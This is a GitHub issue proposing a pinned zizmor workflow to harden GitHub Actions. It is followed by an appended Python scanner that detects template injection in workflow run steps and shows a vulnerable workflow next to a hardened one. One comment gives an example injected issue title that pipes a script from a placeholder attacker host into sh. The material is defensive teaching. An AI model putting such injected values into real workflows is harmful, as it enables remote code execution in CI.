Harden GHA with Zizmor #2681

@webknjaz

Hey @oraNod, here's an integration you can add through GHA itself:

```yaml
---

name: GitHub Actions Security Analysis with zizmor 🌈

on:  # yamllint disable-line rule:truthy
  push:
  pull_request:

jobs:
  zizmor:
    name: 🌈 zizmor

    # needed so the reusable workflow can upload its SARIF report to code scanning
    permissions:
      security-events: write

    # pinned to a full commit SHA rather than a mutable tag or branch, so the
    # reusable workflow cannot be swapped out from under this caller
    # yamllint disable-line rule:line-length
    uses: zizmorcore/workflow/.github/workflows/reusable-zizmor.yml@3bb5e95068d0f44b6d2f3f7e91379bed1d2f96a8

...
```

Optionally, it could also be added to pre-commit on top: https://docs.zizmor.sh/usage/#use-with-pre-commit.

It'll reveal a number of problems, each explained @ https://docs.zizmor.sh/audits/.

cc @felixfontein @gotmax23 this might be interesting to you in the context of the entire set of community repos.
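As an added illustration of one class of finding zizmor reports (its template-injection audit), and not code from this issue or from the zizmor project: the Python below scans a constructed workflow for `${{ ... }}` expressions inside `run:` steps that expand attacker-controlled contexts, and shows the hardened form beside the vulnerable one. The workflow snippets, the list of untrusted contexts and the scanner itself are my own simplified assumptions for this example; zizmor's real audit covers more cases.

```python
import re

# Constructed vulnerable step (not from the issue): the issue title is expanded
# into the script text before the shell runs, so a title such as
#   a"; curl attacker.example | sh; echo "
# becomes part of the command. Quoting the expression does not help, because
# the substitution happens before the shell ever sees the line.
VULNERABLE = """\
name: greet
on:
  issues:
    types: [opened]
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      - run: echo "New issue: ${{ github.event.issue.title }}"
"""

# Hardened form: the expression is bound to an environment variable and the
# script only references the variable, so the shell never parses the title.
HARDENED = """\
name: greet
on:
  issues:
    types: [opened]
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      - env:
          TITLE: ${{ github.event.issue.title }}
        run: echo "New issue: $TITLE"
"""

# Contexts an outside contributor can set directly. Simplified list assumed
# for this example; GitHub's security guidance enumerates the full set.
UNTRUSTED = [re.compile(p) for p in (
    r"github\.event\.issue\.(title|body)",
    r"github\.event\.pull_request\.(title|body)",
    r"github\.event\.comment\.body",
    r"github\.event\.review\.body",
    r"github\.event\.head_commit\.(message|author\.(name|email))",
    r"github\.event\.commits\[\d+\]\.message",
    r"github\.event\.pull_request\.head\.(ref|label)",
    r"github\.head_ref",
)]
EXPR = re.compile(r"\$\{\{(.*?)\}\}")
RUN_KEY = re.compile(r"^(\s*)(-\s+)?run:\s*(.*)$")


def run_scripts(workflow):
    """Yield (line_number, script) for every run: value, following block
    scalars (| or >) by indentation instead of a full YAML parse."""
    lines = workflow.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        if not m:
            i += 1
            continue
        indent, dash, rest = m.groups()
        key_col = len(indent) + len(dash or "")
        if rest.strip() in ("|", "|-", "|+", ">", ">-", ">+"):
            body, j = [], i + 1
            while j < len(lines) and (
                not lines[j].strip()
                or len(lines[j]) - len(lines[j].lstrip()) > key_col
            ):
                body.append(lines[j])
                j += 1
            yield i + 1, "\n".join(body)
            i = j
        else:
            yield i + 1, rest
            i += 1


def find_template_injection(workflow):
    """Return [(line_number, expression)] for expressions inside run: scripts
    that expand one of the untrusted contexts above."""
    findings = []
    for lineno, script in run_scripts(workflow):
        for expr in EXPR.findall(script):
            expr = expr.strip()
            if any(p.search(expr) for p in UNTRUSTED):
                findings.append((lineno, expr))
    return findings


if __name__ == "__main__":
    for label, wf in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        print(label, find_template_injection(wf))
```

The hardened step is the fix zizmor's documentation recommends for this finding: pass the value through `env:` so it reaches the script as data, never as script text. The same scanner also follows multi-line `run: |` blocks, which is where these expansions usually hide in real workflows.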
